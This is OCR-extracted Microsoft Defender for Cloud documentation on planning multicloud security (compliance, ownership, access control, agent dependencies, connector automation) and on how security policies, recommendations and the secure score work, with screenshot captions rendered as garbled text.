For the Defender for Databases plan in a multicloud scenario, you leverage Azure Arc to 
manage the multicloud SQL Server databases. The SQL Server instance is installed in a 
virtual or physical machine connected to Azure Arc. 


e The Azure Connected Machine agent is installed on machines connected to Azure 
Arc. 

e The Defender for Databases plan should be enabled in the subscription in which 
the Azure Arc machines are located. 

e The Log Analytics agent for Microsoft Defender SQL Servers should be provisioned 
on the Azure Arc machines. It collects security-related configuration settings and 
event logs from machines. 

e Automatic SQL server discovery and registration needs to be set to On to allow 
SQL database discovery on the machines. 


When it comes to the actual AWS and GCP resources that are protected by Defender for 
Cloud, their location is set directly from the AWS and GCP clouds. 


Next steps 


In this article, you have learned how to determine your data residency requirements 
when designing a multicloud security solution. Continue with the next step to determine 


compliance requirements. 


Determine compliance requirements 


Article e 05/10/2023 


This article is part of a series to provide guidance as you design a cloud security posture 
management (CSPM) and cloud workload protection (CWP) solution across multicloud 
resources with Microsoft Defender for Cloud. 


Goal 


Identify compliance requirements in your organization as you design your multicloud 


solution. 


Get started 


Defender for Cloud continually assesses the configuration of your resources against 
compliance controls and best practices in the standards and benchmarks you've applied 
in your subscriptions. 


e By default every subscription has the Azure Security Benchmark assigned. This 
benchmark contains Microsoft Azure security and compliance best practices, based 


on common compliance frameworks. 


e AWS standards include AWS Foundational Best Practices, CIS 1.2.0, and PCI DSS 
3.2.1. 


e GCP standards include GCP Default, GCP CIS 1.1.0/1.2.0, GCP ISO 27001, GCP NIST 
800 53, and PCI DSS 3.2.1. 


e By default, every subscription that contains the AWS connector has the AWS 
Foundational Security Best Practices assigned. 


e Every subscription with the GCP connector has the GCP Default benchmark 
assigned. 


e For AWS and GCP, the compliance monitoring freshness interval is 4 hours. 


After you enable enhanced security features, you can add other compliance standards to 
the dashboard. Regulatory compliance is available when you enable at least one 
Defender plan on the subscription in which the multicloud connector is located, or on 
the connector. 


Additionally, you can also create your own custom standards and assessments for 
AISE and GCP & to align to your organizational requirements. 


Next steps 


In this article, you've learned how to determine your compliance requirements when 
designing a multicloud security solution. Continue with the next step to determine 
ownership requirements. 


Determine ownership requirements 


Article e 05/10/2023 


This article is one of a series providing guidance as you design a cloud security posture 
management (CSPM) and cloud workload protection (CWP) solution across multicloud 


resources with Microsoft Defender for Cloud. 


Goal 


Identify the teams involved in your multicloud security solution, and plan how they will 
align and work together. 


Security functions 


Depending on the size of your organization, separate teams will manage security 
functions. In a complex enterprise, functions might be numerous. 


Security Details 

function 

Security Reducing organizational risk by reducing the time in which bad actors have access 
Operations to corporate resources. Reactive detection, analysis, response and remediation of 

(SecOps) attacks. Proactive threat hunting. 

Security Security design summarizing and documenting the components, tools, processes, 


architecture teams, and technologies that protect your business from risk. 


Security Processes that ensure the organization is compliant with regulatory requirements 
compliance and internal policies. 

management 

People Protecting the organization from human risk to security. 

security 

Application Integrating security into DevOps processes and apps. 

security and 

DevSecOps 


Data security Protecting your organizational data. 


Infrastructure Providing protection, detection and response for infrastructure, networks, and 
and endpoint endpoint devices used by apps and users. 
security 


Security Details 
function 


Identity and Authenticating and authorizing users, services, devices, and apps. Provide secure 


key distribution and access for cryptographic operations. 
management 
Threat Making decisions and acting on security threat intelligence that provides context 


intelligence and actionable insights on active attacks and potential threats. 


Posture Continuously reporting on, and improving, your organizational security posture. 
management 
Incident Building tools, processes, and expertise to respond to security incidents. 


preparation 


Team alignment 


Despite the many different teams who manage cloud security, it's critical that they work 
together to figure out who's responsible for decision making in the multicloud 
environment. Lack of ownership creates friction that can result in stalled projects and 
insecure deployments that couldn't wait for security approval. 


Security leadership, most commonly under the CISO, should specify who's accountable 
for security decision making. Typically, responsibilities align as summarized in the table. 


Category Description Typical Team 

Server Monitor and remediate server security, includes Joint responsibility of 
endpoint patching, configuration, endpoint security, etc. central IT operations and 
security Infrastructure and 


endpoint security teams. 


Incident Investigate and remediate security incidents in your Security operations 
monitoring organization's SIEM or source console. team. 

and 

response 

Policy Set direction for Azure role-based access control Joint responsibility of 
management (Azure RBAC), Microsoft Defender for Cloud, policy and standards and 


administrator protection strategy, and Azure Policy, in security architecture 
order to govern Azure resources, custom AWS/GCP teams. 
recommendations etc. 


Category Description Typical Team 


threat and Maintain complete visibility and control of the Joint responsibility of 
vulnerability infrastructure, to ensure that critical issues are central IT operations and 
management discovered and remediated as efficiently as possible. Infrastructure and 


endpoint security teams. 


Application Focus on security controls for specific workloads. The Joint responsibility of 


workloads goal is to integrate security assurances into application development 
development processes and custom line of business and central IT operations 
(LOB) applications. teams. 

Identity Understand Permission Creep Index (PCI) for Azure Joint responsibility of 

security and subscriptions, AWS accounts, and GCP projects, in identity and key 

standards order to identify risks associated with unused or management, policy and 


excessive permissions across identities and resources. standards, and security 
architecture teams. 


Best practices 


e Although multicloud security might be divided across different areas of the 
business, teams should manage security across the multicloud estate. This is better 
than having different teams secure different cloud environments. For example 
where one team manages Azure and another team manages AWS. Teams working 
across multicloud environments helps to prevent sprawl within the organization. It 
also helps to ensure that security policies and compliance requirements are 
applied in every environment. 

e Often, teams that manage Defender for Cloud don't have privileges to remediate 
recommendations in workloads. For example, the Defender for Cloud team might 
not be able to remediate vulnerabilities in an AWS EC2 instance. The security team 
might be responsible for improving the security posture, but unable to fix the 
resulting security recommendations. To address this issue: 

o It's imperative to involve the AWS workload owners. 

o Assigning owners with due dates and defining governance rules creates 
accountability and transparency, as you drive processes to improve security 
posture. 

e Depending on organizational models, we commonly see these options for central 
security teams operating with workload owners: 


o Option 1: Centralized model. Security controls are defined, deployed, and 
monitored by a central team. 
o The central security team decides which security policies will be implemented 
in the organization and who has permissions to control the set policy. 


fe) 


The team might also have the power to remediate non-compliant resources 
and enforce resource isolation in case of a security threat or configuration 
issue. 

Workload owners on the other hand are responsible for managing their 
cloud workloads but need to follow the security policies that the central team 
has deployed. 

This model is most suitable for companies with a high level of automation, to 
ensure automated response processes to vulnerabilities and threats. 


o Option 2: Decentralized model.- Security controls are defined, deployed, and 


monitored by workload owners. 


fe) 


Security control deployment is done by workload owners, as they own the 
policy set and can therefore decide which security policies are applicable to 
their resources. 

Owners need to be aware of, understand, and act upon security alerts and 
recommendations for their own resources. 

The central security team on the other hand only acts as a controlling entity, 
without write-access to any of the workloads. 

The security team usually has insights into the overall security posture of the 
organization, and they might hold the workload owners accountable for 
improving their security posture. 

This model is most suitable for organizations that need visibility into their 
overall security posture, but at the same time want to keep responsibility for 
security with the workload owners. 

Currently, the only way to achieve Option 2 in Defender for Cloud is to assign 
the workload owners with Security Reader permissions to the subscription 
that's hosting the multicloud connector resource. 


Next steps 


In this article, you have learned how to determine ownership requirements when 


designing a multicloud security solution. Continue with the next step to determine 


access control requirements. 


Determine access control requirements 


Article e 05/10/2023 


This article is part of a series to provide guidance as you design a cloud security posture 
management (CSPM) and cloud workload protection (CWP) solution across multicloud 
resources with Microsoft Defender for Cloud. 


Goal 


Figure out what permissions and access controls you need on your multicloud 
deployment. 


Get started 


As part of your multicloud solution design you should review access requirements for 
multicloud resources that will be available to users. As you plan, answer the following 
questions, take notes, and be clear about the reasons for the answer. 


e Who should have access to recommendations and alerts for multicloud resources? 
e Are your multicloud resources and environments owned by different teams? If so, 
does each team need the same level of access? 
e Do you need to limit access to specific resources for specific users and groups? If 
so, how can you limit access for Azure, AWS, and GCP resources? 
e Does your organization need identity and access management (IAM permissions) 
to be inherited to the resource group level? 
e Do you need to determine any IAM requirements for people who: 
o Implement JIT attack surface reduction VMs and AWS EC2? 
o Define Adaptive Application Controls (access defined by application owner)? 
o Security operations? 


With clear answers available, you can figure out your Defender for Cloud access 
requirements. Other things to consider: 


e Defender for Cloud multicloud capabilities support inheritance of IAM permissions. 

e Whatever permissions the user has for the resource group level where the 
AWS/GCP connectors reside, are inherited automatically for multicloud 
recommendations and security alerts. 


Next steps 


In this article, you've learned how to determine access control requirements needs when 
designing a multicloud security solution. Continue with the next step to determine 
multicloud dependencies. 


Determine multicloud dependencies 


Article e 08/30/2023 


This article is one of a series providing guidance as you design a cloud security posture 
management (CSPM) and cloud workload protection (CWP) solution across multicloud 
resources with Microsoft Defender for Cloud. 


Goal 


Figure out dependencies that might influence your multicloud design. 


Get started 


As you design your multicloud solution, it’s important to have a clear picture of the 
components needed to enjoy all multicloud features in Defender for Cloud. 


CSPM 


Defender for Cloud provides Cloud Security Posture Management (CSPM) features for 
your AWS and GCP workloads. 


e After you onboard AWS and GCP, Defender for Cloud starts assessing your 
multicloud workloads against industry standards, and reports on your security 
posture. 

e CSPM features are agentless and don't rely on any other components except for 
successful onboarding of AWS/GCP connectors. 

e Ez important to note that the Security Posture Management plan is turned on by 
default and can’t be turned off. 

e Learn about the IAM permissions needed to discover AWS resources for CSPM. 


CWPP 


O Note 


As the Log Analytics agent is set to retire in August 2024 and as part of the 
Defender for Cloud updated strategy, all Defender for Servers features and 
capabilities will be provided either through Microsoft Defender for Endpoint 
integration or agentless scanning, without dependency on either the Log Analytics 


agent (MMA) or Azure Monitor agent (AMA). For more information about this 


change, see this announcement. 


In Defender for Cloud, you enable specific plans to get Cloud Workload Platform 
Protection (CWPP) features. Plans to protect multicloud resources include: 


e Defender for Servers: Protect AWS/GCP Windows and Linux machines. 

e Defender for Containers: Help secure your Kubernetes clusters with security 
recommendations and hardening, vulnerability assessments, and runtime 
protection. 

e Defender for SQL: Protect SQL databases running in AWS and GCP. 


What extension do I need? 


The following table summarizes extension requirements for CWPP. 


Extension Defender for Defender for Defender for SQL 
Servers Containers on Machines 
Azure Arc Agent vV vV v 
Microsoft Defender for Endpoint vV 
extension 
Vulnerability assessment vV 
Agentless Disk Scanning vV vV 
Log Analytics or Azure Monitor vV vV 


Agent (preview) extension 


Defender agent v 

Azure Policy for Kubernetes vV 

Kubernetes audit log data vV 
SQL servers on machines vV 
Automatic SQL server discovery vV 


and registration 


Defender for Servers 


Enabling Defender for Servers on your AWS or GCP connector allows Defender for Cloud 
to provide server protection to your Google Compute Engine VMs and AWS EC2 


instances. 


Review plans 


Defender for Servers offers two different plans: 


e Plan 1: 


o MDE integration: Plan 1 integrates with Microsoft Defender for Endpoint Plan 2 


to provide a full endpoint detection and response (EDR) solution for machines 

running a range of operating systems. Defender for Endpoint features include: 

o Reducing the attack surface for machines. 

o Providing antivirus capabilities. 

o Threat management, including threat hunting, detection, analytics, and 
automated investigation and response. 

Provisioning: Automatic provisioning of the Defender for Endpoint sensor on 

every supported machine that's connected to Defender for Cloud. 

Licensing: Charges Defender for Endpoint licenses per hour instead of per seat, 

lowering costs by protecting virtual machines only when they are in use. 


e Plan 2: Includes all the components of Plan 1 along with additional capabilities 


such as File Integrity Monitoring (FIM), Just-in-time (JIT) VM access, and more. 


Review the features of each plan before onboarding to Defender for Servers. 


Review components 


The following components and requirements are needed to receive full protection from 


the Defender for Servers plan: 


e Azure Arc agent: AWS and GCP machines connect to Azure using Azure Arc. The 


Azure Arc agent connects them. 


O 


The Azure Arc agent is needed to read security information on the host level 
and allow Defender for Cloud to deploy the agents/extensions required for 
complete protection. To autoprovision the Azure Arc agent, the OS 
configuration agent on GCP VM instances and the AWS Systems Manager (SSM) 
agent for AWS EC2 instances must be configured. Learn more about the agent. 


e Defender for Endpoint capabilities: The Microsoft Defender for Endpoint agent 


provides comprehensive endpoint detection and response (EDR) capabilities. 


e Vulnerability assessment: Using either the integrated Qualys vulnerability scanner, 


or the Microsoft Defender Vulnerability Management solution. 


e Log Analytics agent/Azure Monitor Agent (AMA) (in preview): Collects security- 


related configuration information and event logs from machines. 


Check networking requirements 


Machines must meet network requirements before onboarding the agents. 
Autoprovisioning is enabled by default. 


Defender for Containers 


Enabling Defender for Containers provides GKE and EKS clusters and underlying hosts 
with threat detection capabilities that include: 


e Kubernetes behavioral analytics 
e Anomaly detection 
e Security best practices 


e Built-in admission control policies and more 


Review components-Defender for Containers 
The required components are as follows: 


e Azure Arc Agent: Connects your GKE and EKS clusters to Azure, and onboards the 
Defender agent. 

e Defender agent: Provides host-level runtime threat protection. 

e Azure Policy for Kubernetes: Extends the Gatekeeper v3 to monitor every request 
to the Kubernetes API server, and ensures that security best practices are being 
followed on clusters and workloads. 

e Kubernetes audit logs: Audit logs from the API server allow Defender for 
Containers to identify suspicious activity within your multicloud servers, and 
provide deeper insights while investigating alerts. Sending of the “Kubernetes 
audit logs” needs to be enabled on the connector level. 


Check networking requirements-Defender for Containers 


Make sure to check that your clusters meet network requirements so that the Defender 
agent can connect with Defender for Cloud. 


Defender for SQL 


Defender for SQL provides threat detection for the GCP Compute Engine and AWS. The 
Defender for SQL Server on Machines plan must be enabled on the subscription where 
the connector is located. 


Review components-Defender for SQL 


To receive the full benefits of Defender for SQL on your multicloud workload, you need 
these components: 


e Azure Arc agent: AWS and GCP machines connect to Azure using Azure Arc. The 

Azure Arc agent connects them. 

o The Azure Arc agent is needed to read security information on the host level 
and allow Defender for Cloud to deploy the agents/extensions required for 
complete protection. 

o To autoprovision the Azure Arc agent, the OS configuration agent on GCP VM 
instances and the AWS Systems Manager (SSM) agent for AWS EC2 instances 
must be configured. Learn more about the agent. 

e Log Analytics agent/Azure Monitor Agent (AMA) (in preview): Collects security- 
related configuration information and event logs from machines 

e Automatic SQL server discovery and registration: Supports automatic discovery 
and registration of SQL servers 


Next steps 


In this article, you have learned how to determine multicloud dependencies when 
designing a multicloud security solution. Continue with the next step to automate 
connector deployment. 


Automate connector deployment 
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This article is part of a series to guide you in designing a solution for cloud security 
posture management (CSPM) and cloud workload protection (CWP) across multicloud 
resources with Microsoft Defender for Cloud. 


Goal 


Connect AWS accounts and/or GCP projects programmatically. 


Get started 


As an alternative to creating connectors in the Defender for Cloud portal, you can create 
them programmatically by using the Defender for Cloud REST API. Review the Security 
Connectors - REST API. 


Security Connectors 


Reference 


Service: Security Center 


API Version: 2021-12-01-preview 
Operations 
Create Or Update Creates or updates a security connector. If a security connector is already 
created and a subsequent request is issued for the same security 
connector id, then ... 
Delete Deletes a security connector. 
Get Retrieves details of a specific security connector 
List Lists all the security connectors in the specified subscription. Use the 
‘nextLink' property in the response to get the next page of security 
connectors for the.. 
List By Resource Group Lists all the security connectors in the specified resource group. Use the 
‘nextLink' property in the response to get the next page of security 
connectors for t.. 
Update Updates a security connector Q 


e When you use REST API to create the connector, you also need the 
CloudFormation template, or Cloud Shell script, depending on the environment 


that you're onboarding to Defender for Cloud. 

e The easiest way to get this script is to download it from the Defender for Cloud 
portal. 

e The template/script changes depending on the plans you're enabling. 


Next steps 


In this article, you've learned that as an alternative to creating connectors in the 
Defender for Cloud portal, you can create them programmatically by using the Defender 
for Cloud REST API. For more information, see other resources. 


What are security policies, initiatives, 
and recommendations? 
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Microsoft Defender for Cloud applies security initiatives to your subscriptions. These 
initiatives contain one or more security policies. Each of those policies results in a 
security recommendation for improving your security posture. This page explains each 
of these ideas in detail. 


What is a security policy? 


An Azure Policy definition, created in Azure Policy, is a rule about specific security 
conditions that you want controlled. Built in definitions include things like controlling 
what type of resources can be deployed or enforcing the use of tags on all resources. 
You can also create your own custom policy definitions. 


To implement these policy definitions (whether built-in or custom), you'll need to assign 
them. You can assign any of these policies through the Azure portal, PowerShell, or 
Azure CLI. Policies can be disabled or enabled from Azure Policy. 


There are different types of policies in Azure Policy. Defender for Cloud mainly uses 
‘Audit’ policies that check specific conditions and configurations then report on 
compliance. There are also "Enforce' policies that can be used to apply secure settings. 


What is a security initiative? 


A security initiative is a collection of Azure Policy definitions, or rules, are grouped 
together towards a specific goal or purpose. Security initiatives simplify management of 
your policies by grouping a set of policies together, logically, as a single item. 


A security initiative defines the desired configuration of your workloads and helps 
ensure you're complying with the security requirements of your company or regulators. 


Like security policies, Defender for Cloud initiatives are also created in Azure Policy. You 
can use Azure Policy to manage your policies, build initiatives, and assign initiatives to 
multiple subscriptions or for entire management groups. 


The default initiative automatically assigned to every subscription in Microsoft Defender 
for Cloud is Microsoft cloud security benchmark. This benchmark is the Microsoft- 
authored set of guidelines for security and compliance best practices based on common 


compliance frameworks. This widely respected benchmark builds on the controls from 
the Center for Internet Security (CIS) “ and the National Institute of Standards and 
Technology (NIST) Z with a focus on cloud-centric security. Learn more about Microsoft 
cloud security benchmark. 


Defender for Cloud offers the following options for working with security initiatives and 
policies: 


e View and edit the built-in default initiative - When you enable Defender for 
Cloud, the initiative named ‘Microsoft cloud security benchmark’ is automatically 
assigned to all Defender for Cloud registered subscriptions. To customize this 
initiative, you can enable or disable individual policies within it by editing a policy's 
parameters. See the list of built-in security policies to understand the options 
available out-of-the-box. 


e Add your own custom initiatives - If you want to customize the security initiatives 
applied to your subscription, you can do so within Defender for Cloud. You'll then 
receive recommendations if your machines don't follow the policies you create. For 
instructions on building and assigning custom policies, see Using custom security 
initiatives and policies. 


e Add regulatory compliance standards as initiatives - Defender for Cloud's 
regulatory compliance dashboard shows the status of all the assessments within 
your environment in the context of a particular standard or regulation (such as 
Azure CIS, NIST SP 800-53 R4, SWIFT CSP CSCF-v2020). For more information, see 
Improve your regulatory compliance. 


What is a security recommendation? 


Using the policies, Defender for Cloud periodically analyzes the compliance status of 
your resources to identify potential security misconfigurations and weaknesses. It then 
provides you with recommendations on how to remediate those issues. 
Recommendations are the result of assessing your resources against the relevant 


policies and identifying resources that aren't meeting your defined requirements. 


Defender for Cloud makes its security recommendations based on your chosen 
initiatives. When a policy from your initiative is compared against your resources and 
finds one or more that aren't compliant, it's presented as a recommendation in 
Defender for Cloud. 


Recommendations are actions for you to take to secure and harden your resources. Each 
recommendation provides you with the following information: 


e A short description of the issue 
e The remediation steps to carry out in order to implement the recommendation 
e The affected resources 


In practice, it works like this: 
1. Microsoft cloud security benchmark is an initiative that contains requirements. 


For example, Azure Storage accounts must restrict network access to reduce their 
attack surface. 


2. The initiative includes multiple policies, each with a requirement of a specific 
resource type. These policies enforce the requirements in the initiative. 


To continue the example, the storage requirement is enforced with the policy 


"Storage accounts should restrict network access using virtual network rules”. 


3. Microsoft Defender for Cloud continually assesses your connected subscriptions. If 
it finds a resource that doesn't satisfy a policy, it displays a recommendation to fix 
that situation and harden the security of resources that aren't meeting your 
security requirements. 


So, for example, if an Azure Storage account on any of your protected 
subscriptions isn't protected with virtual network rules, you'll see the 
recommendation to harden those resources. 


So, (1) an initiative includes (2) policies that generate (3) environment-specific 
recommendations. 
Security recommendation details 


Security recommendations contain details that help you understand its significance and 
how to handle it. 


Machines should have vulnerability findings resolved = X 


O) Exempt S Disable rule C: View policy definition Vv Open query v O 


Severity © Freshness interval © Exempted resources © Tactics and techniques © 
beu ® 4 Hours EO Initial Access (+5 


3 
"ó View all exemptions 


v Description © 


^ Related recommendations (1) @ 


Recommendation Ty Dependency type Ty Affected resources Ty 


Y= Machines should have a vulnerability assessment solution Prerequisite 136 of 163 


v Remediation steps © 


^ Affected resources 


Unhealthy resources (22) Healthy resources (1) Not applicable resources (164) 


| Ø Search VMs & servers 


E Name Ty Subscription 
O F vms ASC DEMO 
O i vm4 ASC DEMO 


E 


The recommendation details shown are: 


1. For supported recommendations, the top toolbar shows any or all of the following 


buttons: 


e Enforce and Deny (see Prevent misconfigurations with Enforce/Deny 
recommendations). 

e View policy definition to go directly to the Azure Policy entry for the 
underlying policy. 

e Open query - You can view the detailed information about the affected 
resources using Azure Resource Graph Explorer. 


2. Severity indicator 
3. Freshness interval 


4. Count of exempted resources if exemptions exist for a recommendation, this 
shows the number of resources that have been exempted with a link to view the 
specific resources. 


5. Mapping to MITRE ATT&CK ® tactics and techniques if a recommendation has 
defined tactics and techniques, select the icon for links to the relevant pages on 


MITRE's site. This applies only to Azure scored recommendations. 
Management ports should be closed on your virtual machines x 


2) Exempt C: View policy definition ay Open query 


Severity Freshness interval Tactics and techniques 


(ea ® 24 Hours FJ Initial Access 


ed 
A^ Description 


Open remote manageme 
attempt to brute force cl EU initial Access Read a KO 


v Remediation steps External Remote Services (17133) 7 


^ Affected resources 


6. Description - A short description of the security issue. 
7. When relevant, the details page also includes a table of related recommendations: 
The relationship types are: 


e Prerequisite - A recommendation that must be completed before the 
selected recommendation 

e Alternative - A different recommendation, which provides another way of 
achieving the goals of the selected recommendation 

e Dependent - A recommendation for which the selected recommendation is a 


prerequisite 


For each related recommendation, the number of unhealthy resources is shown in 


the "Affected resources" column. 


Q Tip 


If a related recommendation is grayed out, its dependency isn't yet completed 


and so isn't available. 


8. Remediation steps - A description of the manual steps required to remediate the 
security issue on the affected resources. For recommendations with the Fix option, 
you can selectView remediation logic before applying the suggested fix to your 


resources. 


9. Affected resources - Your resources are grouped into tabs: 


e Healthy resources — Relevant resources, which either aren't impacted or on 
which you've already remediated the issue. 

e Unhealthy resources — Resources that are still impacted by the identified 
issue. 

e Not applicable resources — Resources for which the recommendation can't 
give a definitive answer. The not applicable tab also includes reasons for each 


resource. 


Vulnerabilities in your virtual machines should be remediated 


^ Description 


Monitors for vulnerabilities on your virtual machines as discovered by a vulnerability assessment solution. 


v Remediation steps 


^ Affected resources 


Unhealthy resources (2) Healthy resources (1) Not applicable resources (22) 


| O Search virtual machines 
Name TA, Subscription | Reason 
HA vmtest Contoso The extension might be corrupted, please try to remove it and deploy again 


Le VM1 Contoso Findings have not been received yet for the VM 


E pata Contoso Vulnerability assessment scanner is not deployed on the VM 


10. Action buttons to remediate the recommendation or trigger a logic app. 


Viewing the relationship between a 
recommendation and a policy 


As mentioned above, Defender for Cloud's built in recommendations are based on the 
Microsoft cloud security benchmark. Almost every recommendation has an underlying 
policy that is derived from a requirement in the benchmark. 


When you're reviewing the details of a recommendation, it's often helpful to be able to 
see the underlying policy. For every recommendation supported by a policy, use the 
View policy definition link from the recommendation details page to go directly to the 
Azure Policy entry for the relevant policy: 


Management ports should be closed on your virtual machines 


ZA Exempt CE View policy definition 


Freshness interval 


® 24 Hours 


Severity 


| Medium 


v Description 
ba Remediation steps 
^ Affected resources 


Unhealthy resources (25) Healthy resources (121) 


Not applicable resources (42) 


| Ø Search virtual machines 


[C] Name 
JU HO neu 


O ee wcVM 
O EZ srvms4 


Trigger logic app Exempt 


Ty Subscription 
Contoso Infra1 
Contoso Infra1 


Rome OMS Dev1 Test 1 


Use this link to view the policy definition and review the evaluation logic. 


If you're reviewing the list of recommendations on our Security recommendations 


reference guide, you'll also see links to the policy definition pages: 


Management ports should be 
closed on your virtual machines 
machine. 


Open remote management ports are exposing your VM to a high level of risk from Internet- 
based attacks. These attacks attempt to brute force credentials to gain admin access to the 


(Related policy: Management ports ZE be closed on your virtual machines & ) 


Next steps 


This page explained, at a high level, the basic concepts and relationships between 


policies, initiatives, and recommendations. For related information, see: 


e Create custom initiatives 
e Disable security recommendations 


e Learn how to edit a security policy in Azure Policy 


Secure score 
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Overview of secure score 
Microsoft Defender for Cloud has two main goals: 


e to help you understand your current security situation 
e to help you efficiently and effectively improve your security 


The central feature in Defender for Cloud that enables you to achieve those goals is the 


secure score. 


All Defender for Cloud customers automatically gain access to the secure score when 
they enable Defender for Cloud. Microsoft Cloud Security Benchmark (MCSB), formerly 
known as Azure Security Benchmark, is automatically applied to your environments and 
will generate all the built-in recommendations that are part of this default initiative. 


Defender for Cloud continually assesses your cross-cloud resources for security issues. It 
then aggregates all the findings into a single score so that you can tell, at a glance, your 
current security situation: the higher the score, the lower the identified risk level. 


e Inthe Azure portal pages, the secure score is shown as a percentage value and the 
underlying values are also clearly presented: 


9 Security posture 


v 

& 184/247 Sa 156/63 

Unassigned recommendation Overdue recommendations 

Secure score 
Go Azure 55% 
Eee 

43% ZT AWS 31% 
SECURE SCORE z=] 

«> GCP 24% 
E 


Explore your security posture > 


e Inthe Azure mobile app, the secure score is shown as a percentage value and you 
can tap the secure score to see the details that explain the score: 


€ Contoso Intra? < w € Secure score 


Contoso Infra Overall secure score 
Subscription 
EO 
@ Active 9 54% (~26 out of 48 points) 
Activity log More 


No events in the last week Fixed 
54% (26 points) 
Properties More 
earthy 


Subscription 46% (22 points) 


Contoso Infra 


Subscription ID 7 en fied 1 k E | 
0ba674a6-9fde-43b4-8370-a7e1 6fd/0641 


Management | lea 
13 


aa Access Control (IAM) 


Resource groups 


[>a] my-rg123456 


Resource group 


EE Sarera 
To increase your security, review Defender for Cloud's recommendations page and 
remediate the recommendation by implementing the remediation instructions for each 
issue. Recommendations are grouped into security controls. Each control is a logical 
group of related security recommendations, and reflects your vulnerable attack surfaces. 
Your score only improves when you remediate all of the recommendations for a single 
resource within a control. To see how well your organization is securing each individual 
attack surface, review the scores for each security control. 


For more information, see How your secure score is calculated below. 


Manage your security posture 


On the Security posture page, you're able to see the secure score for your entire 
subscription, and each environment in your subscription. By default all environments are 
shown. 


a 


efender for Cloud | Security posture 


E secure score over time [Z] Governance report ÑP Guides & Feedback 


D a a ee E mee cert te et E ety Pky es > 


ae ega eee 
NT za 
O Aare m — d 60/63 
GO ge ee [subscriptions $9 | Accounts 12 I Projects 6 Overdue recommendations © 
GCP 27% s= s= 
a % 3590799 $534 O15 Zra 228/245 
eeta Setze 
de Ge 
a feet on 
243497198597 (nazcor: reOrgName) 
@ emer om 
Ss po 
O ee ad 
a toneto- -oer rro E 
Ee oom e 
Page section Description 


@ Azure @ aws 


117 total 


I subscriptions 99 [Accounts 12 Il Projéets 


Tb 3590/19199 Y= 314 
Rev 


Unhealthy resoure es commendations, 


@ ccp 


©15 


Attack paths 


D sroup by environment 


Select your environment to see its secure score, and details. Multiple 
environments can be selected at once. The page will change based on 


your selection here. 


Shows the total number of subscriptions, accounts and projects that 
affect your overall score. It also shows how many unhealthy resources 
and how many recommendations exist in your environments. 


The bottom half of the page allows you to view and manage viewing the individual 


secure scores, number of unhealthy resources and even view the recommendations for 


all of your individual subscriptions, accounts, and projects. 


You can group this section by environment by selecting the Group by Environment 


checkbox. 


Environment 


| AØ Search by name Environment == All O Group by environment 


Name 4 Secure score Ty Unhealthy resources Ty Recommendations 


ASC DEMO 
gS O 72% 89 of 252 View recommendations > 
Azure subscription 


© 931372706709 (contoso-containers-demo) GO 42% EEE ei ideia 
3 lew 5> 
GCP project 
SO 824165489733 (AwsManagementAccount_824165489733) C] ZO am erin eaen 
AWS account 
© 764673796399 (GcpProdConnector) Ọ 34% Setia EETA 
GCP project 7 ` 
© 682457890087 (GCP-Containers) 0 47 setae ae ae nee 
GCP project eis dgn 
478853243894 (AwsManagementAccount_478853243894) G ZO Aze aite 
AI lew ions > 


AWS account 


Page | 1 v | of 2 Next > 


How your secure score is calculated 


The contribution of each security control towards the overall secure score is shown on 
the recommendations page. 


Home > Microsoft De oud 
i ft Defender for Cloud | Recommendations 


] © ere  vowmioad csv reper E open query H] Govemancerepor Ñ? Guides & Feedback 


J beei 
E 43% $= 237/299 ee 12 SEa mi @ OI 


Secure score o Active recommendations TUnheatthy (585) 8 Healthy (15609) i Not applicable (475) 


Recommendation status == None < Severity == None X Resourcetype == None X Recommendation maturity == None X Owner == None X Environment == AWS, Azure, GCP X fy add fiter 


Diagnose and soe problems Potential score increase ty stan 


‘loud security 
© Securty posture 
© Regulatory compliance 


© Workload protections 


SS? 


> Protect applications against DDoS attacks 


ZG 
Ed 


Not scored Not scored 


Notscored Not scored 


To get all the possible points for a security control, all of your resources must comply 
with all of the security recommendations within the security control. For example, 
Defender for Cloud has multiple recommendations regarding how to secure your 
management ports. You'll need to remediate them all to make a difference to your 
secure score. 


Example scores for a control 


© Name ty 


\ Enable MFA 


In this example: 


e Remediate vulnerabilities security control - This control groups multiple 
recommendations related to discovering and resolving known vulnerabilities. 


e Max score - The maximum number of points you can gain by completing all 
recommendations within a control. The maximum score for a control indicates the 
relative significance of that control and is fixed for every environment. Use the max 
score values to triage the issues to work on first. 

For a list of all controls and their max scores, see Security controls and their 


recommendations. 
e Current score - The current score for this control. 
Current score = [Score per resource] * [Number of healthy resources] 


Each control contributes towards the total score. In this example, the control is 
contributing 2.00 points to current total secure score. 


e Potential score increase - The remaining points available to you within the control. 
If you remediate all the recommendations in this control, your score will increase 
by 9%. 


Potential score increase = [Score per resource] * [Number of unhealthy resources] 
e Insights - Gives you extra details for each recommendation, such as: 


o W Preview recommendation - This recommendation won't affect your secure 
score until it's GA. 


o ¥ Fix - From within the recommendation details page, you can use 'Fix' to 
resolve this issue. 


o @ Enforce - From within the recommendation details page, you can 
automatically deploy a policy to fix this issue whenever someone creates a non- 
compliant resource. 


o © Deny - From within the recommendation details page, you can prevent new 


resources from being created with this issue. 


Calculations - understanding your score 


Metric 


Security 
control's 
current score 


Secure score 
Single 

subscription, 
or connector 


Formula and example 


Max score 


a Ithy 
EE de 


Secure score for a single security control = 


Each individual security control contributes towards the secure score. Each 
resource affected by a recommendation within the control, contributes towards 
the control's current score. The current score for each control is a measure of the 
status of the resources within the control. 


> Remediate vulnerabilities + (6 points) 
Healthy - 4 resources 


Potential increase: 5.69 || Unhealthy - 74 resources 
Current score: 0.31 
Max score: 6 


In this example, the max score of 6 would be divided by 78 because that's the 
sum of the healthy and unhealthy resources. 

6 / 78 = 0.0769 

Multiplying that by the number of healthy resources (4) results in the current 
score: 

0.0769 * 4 = 0.31 


E $ current scores for all controls 
Secure score for a subscription = =—————————————————_ x 100 
¥ maximum scores for all controls 


Name Ty Secure score Ty Unhealthy resources Ty 


ASC DEMO 
Q 34% 


Azure subscription 


9 of 31 


In this example, there's a single subscription, or connector with all security 
controls available (a potential maximum score of 60 points). The score shows 28 
points out of a possible 60 and the remaining 32 points are reflected in the 
“Potential score increase" figures of the security controls. 


Metric 


Formula and example 


Controls 


Y Mv) Ma bi Y bi bi Y bi bi bi b hi bi bai 


This equation is the same equation for a connector with just the word 


Remediate vulnerabilities 

Secure management ports 

Enable encryption at rest 

Restrict unauthorized network access 
Enable DDoS protection on Vnet 
Apply system updates 

Manage access and permissions 
Remediate security configurations 
Apply data classification 

Encrypt data in transit 

Adaptive application control 
Enable auditing and logging 
Enable endpoint protection 
Enable MFA @ Completed 
